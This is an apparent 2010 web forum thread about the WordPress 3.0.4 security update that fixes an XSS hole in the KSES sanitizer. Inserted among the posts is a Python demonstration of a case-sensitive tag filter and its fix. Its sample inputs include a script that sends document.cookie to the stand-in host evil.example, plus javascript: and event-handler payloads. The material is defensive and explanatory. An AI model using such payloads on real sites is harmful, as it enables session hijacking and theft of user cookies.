Greenguy's Board
Old 2010-12-29, 05:29 PM   #1
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Wordpress 3.0.4 XSS critical update

http://wordpress.org/news/2010/12/3-0-4-update/

Quote:
Version 3.0.4 of WordPress, available immediately through the update page in your dashboard or for download here, is a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES. I would rate this release as “critical.”

I realize an update during the holidays is no fun, but this one is worth putting down the eggnog for. In the spirit of the holidays, consider helping your friends as well.

If you are a security researcher, we’d appreciate you taking a look over this changeset as well to review our update. We’ve given it a lot of thought and review but since this is so core we want as many brains on it as possible. Thanks to Mauro Gentile and Jon Cave (duck_) who discovered and alerted us to these XSS vulnerabilities first.
Old 2010-12-29, 05:40 PM   #2
Bill
Selling porn allows me to stay in a constant state of Bliss - ain't that a trip!
 
Join Date: Apr 2003
Posts: 3,914
Do you have a sense of what the vulnerability is? Have you seen or heard of anything exploited yet?
Old 2010-12-29, 05:48 PM   #3
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
I haven't pulled down 3.0.3 and 3.0.4 yet to see what they changed. I've never understood why anyone tries to clean up data... if it doesn't match your validation, it should be declined.

I suspect the error might be in the commenting or post section as that is the only place that library seems to be called - so, if your blog doesn't have comments, it may not be vulnerable. However, it could be in the user's bio field, and an admin that views a user's profile could leak the admin cookie. I'll take a look later; it just seemed prudent to let people know earlier rather than later.
Old 2010-12-29, 06:00 PM   #4
ponyman
Nobody gets into heaven without a glowstick
Join Date: Jun 2004
Location: The Great Northwest
Posts: 422
Good info. Thanks for the heads up! Updating my WP sites now...
Old 2010-12-29, 07:17 PM   #5
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
Changeset:

http://core.trac.wordpress.org/chang...2/branches/3.0

Basically, anywhere someone can enter input that might contain HTML (comments, bio, posts, etc.) can be exploited.
Old 2010-12-29, 07:35 PM   #6
Bill
Selling porn allows me to stay in a constant state of Bliss - ain't that a trip!
 
Join Date: Apr 2003
Posts: 3,914
Damn, you gotta be some sort of frikking genius or savant to understand that page.

But sounds fucked up.

What happens if you have comments set to approve only? Does the exploit still get you?
Old 2010-12-29, 08:05 PM   #7
Ms Naughty
old enough to be Grandma Scrotum
Join Date: Aug 2003
Location: Australia
Posts: 1,408
Would this exploit apply to older versions of WP?
Old 2010-12-29, 08:26 PM   #8
cd34
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
I believe, based on what they changed, that almost every version of WordPress is vulnerable. KSES was their 'end-all, be-all' solution to HTML sanitization, and it has a pretty big hole. Any place you can enter text that could potentially include HTML would be possible to exploit.

While <script> was filtered out correctly, it appears that <SCRIPT> was not.

If the comment is set to approve only, it is possible that a script could be written that could expose your auth information - not the password, but the auth token. A savvy enough person could use that to get into WordPress. Alternatively they could do an iframe exploit that could expose you to malicious content just by viewing the content.

I'm not entirely sure where they use KSES for sanitization, but, it looks like almost every input calls it.

Not really a thrilling thought.
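The case-sensitivity bypass cd34 describes above (lowercase `<script>` stripped, `<SCRIPT>` passed through), as an added Python example that is not part of this thread and is not WordPress or KSES code. The allowlist, the tag and attribute patterns, the `evil.example` URL and the sample comments are all constructed for the illustration. It puts a toy allowlist sanitizer whose tag pattern only recognizes lowercase names beside one that normalizes the name before the lookup and escapes whatever did not parse as a complete tag; it also goes a little beyond the thread by handling the attribute side (event handlers, `javascript:` URLs, an unterminated tag), because a fix that only normalizes case would still leave those open.

```python
"""
Toy allowlist HTML sanitizer illustrating the bug pattern described in the thread:
lowercase <script> stripped, uppercase <SCRIPT> passed through untouched.

Added example, not WordPress or KSES code. The allowlist, the regexes and the
sample comments below are constructed for this illustration.
"""
import re
from html import escape, unescape

# Constructed allowlist: tag name -> attributes permitted on it (all lowercase).
ALLOWED = {
    "a": {"href", "title"},
    "b": set(), "i": set(), "em": set(), "strong": set(), "p": set(), "br": set(),
}
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" = relative URL

# name="v" | name='v' | name=v | name   (attribute names matched in any case)
ATTR_RE = re.compile(
    r"""([A-Za-z][A-Za-z0-9:-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?""")


def _rebuild(closing, name, attr_text):
    """Re-emit an allowed tag from parsed parts, keeping only allowlisted attributes."""
    if closing:
        return f"</{name}>"
    attrs = []
    for m in ATTR_RE.finditer(attr_text):
        aname = m.group(1).lower()
        if aname not in ALLOWED[name]:
            continue                      # drops onclick=, onerror=, style=, ...
        value = unescape(next((g for g in m.groups()[1:] if g is not None), ""))
        if aname == "href":
            # Browsers decode entities and ignore control chars/whitespace before
            # reading the scheme, so check the value the way a browser would see it.
            probe = re.sub(r"[\x00-\x20]", "", value).lower()
            sm = re.match(r"^([a-z][a-z0-9+.\-]*):", probe)
            if (sm.group(1) if sm else "") not in SAFE_SCHEMES:
                continue                  # drops javascript:, data:, vbscript:, ...
        attrs.append(f' {aname}="{escape(value, quote=True)}"')
    return f"<{name}{''.join(attrs)}>"


def _walk(html, tag_re, normalize_case, escape_text):
    """Scan the input: allowed tags are rebuilt, disallowed ones dropped, and the
    text between tags is either passed through verbatim or has its '<' escaped.
    (Attribute values containing '>' are outside this toy's scope.)"""
    out, pos = [], 0
    text = (lambda s: s.replace("<", "&lt;")) if escape_text else (lambda s: s)
    for m in tag_re.finditer(html):
        out.append(text(html[pos:m.start()]))
        closing, name, attr_text = m.group(1), m.group(2), m.group(3)
        if normalize_case:
            name = name.lower()
        if name in ALLOWED:
            out.append(_rebuild(closing, name, attr_text))
        pos = m.end()
    out.append(text(html[pos:]))
    return "".join(out)


# Vulnerable variant (hypothetical): the tag pattern only knows lowercase names,
# so "<SCRIPT>" is never recognized as a tag and is passed through as text, and
# nothing escapes a stray "<". The browser matches tag names case-insensitively.
VULN_TAG_RE = re.compile(r"<(/?)([a-z][a-z0-9]*)([^>]*)>")

def sanitize_vulnerable(html):
    return _walk(html, VULN_TAG_RE, normalize_case=False, escape_text=False)


# Fixed variant: recognize any letter case, lowercase the name before the
# allowlist lookup, and escape every "<" that did not parse as a complete tag
# (which also neutralizes an unterminated "<b onmouseover=..." at end of input,
# which the next '>' on the surrounding page would otherwise close).
FIXED_TAG_RE = re.compile(r"<(/?)([A-Za-z][A-Za-z0-9]*)([^>]*)>")

def sanitize_fixed(html):
    return _walk(html, FIXED_TAG_RE, normalize_case=True, escape_text=True)


def survives_script(sanitizer, html):
    """True if a <script ...> tag, in any letter case, remains after sanitizing."""
    return re.search(r"<script\b", sanitizer(html), re.I) is not None


# Constructed comment bodies; evil.example is a reserved documentation domain.
COOKIE_STEAL = 'document.location="http://evil.example/?c="+document.cookie'
SAMPLE_COMMENTS = [
    f"Nice post <b>really</b> <script>{COOKIE_STEAL}</script>",   # lowercase: stripped by both
    f"Nice post <SCRIPT>{COOKIE_STEAL}</SCRIPT>",                  # uppercase: the bypass
    '<a href="javascript:alert(1)" onclick="alert(1)">click</a>', # attribute checks
    '<A HREF="http://example.com/" TITLE="ok">link</A>',          # benign uppercase tag
    "unterminated <b onmouseover=alert(1)",                       # no closing '>'
]

if __name__ == "__main__":
    for comment in SAMPLE_COMMENTS:
        for label, fn in (("vulnerable", sanitize_vulnerable), ("fixed", sanitize_fixed)):
            flag = "SCRIPT SURVIVES" if survives_script(fn, comment) else "ok"
            print(f"{label:10} {flag:15} {fn(comment)!r}")
```

Run as a script, the vulnerable line for the uppercase sample prints SCRIPT SURVIVES while every fixed line prints ok. The practical check for a real install has the same shape: feed the sanitizer mixed-case and partial-tag variants of a known payload through every field that is stored and later rendered (comments, post bodies, profile bios), and confirm nothing a browser would parse as a tag or event handler comes back.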
Old 2010-12-30, 12:22 PM   #9
bDok
bang bang
Join Date: Mar 2005
Location: SD/OC/LA
Posts: 3,241
Blah. Fun fun fun in updating. I guess I know what I'll be doing later today.